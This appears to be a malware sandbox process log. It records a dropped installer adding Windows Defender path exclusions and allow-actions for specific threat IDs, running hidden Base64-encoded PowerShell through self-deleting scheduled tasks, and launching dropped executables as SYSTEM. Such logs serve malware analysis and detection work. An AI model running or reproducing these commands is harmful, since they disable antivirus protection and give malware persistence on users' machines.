- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3656
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gWqcgZIgn" /SC once /ST 01:11:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5292
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gWqcgZIgn"
  2⤵
  PID:5436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gWqcgZIgn"
  2⤵
  PID:1084
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "fxxmGIjnSbKlnnNZc" /SC once /ST 05:00:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exe\" MC /pTOFdidyt 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2304
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "fxxmGIjnSbKlnnNZc"
  2⤵
  PID:4012
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 600
  2⤵
  - Program crash
  PID:2008

C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe tg /udfdidUwig 385132 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5204
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5372
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5556
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4708
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3600
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "giQwGroiL" /SC once /ST 08:51:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "giQwGroiL"
  2⤵
  PID:5512
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "giQwGroiL"
  2⤵
  PID:6076
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LOHPKuWKJcOzSYPZu" /SC once /ST 08:43:22 /RU "SYSTEM" /TR "\"C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exe\" mM /xJnNdiddy 385132 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
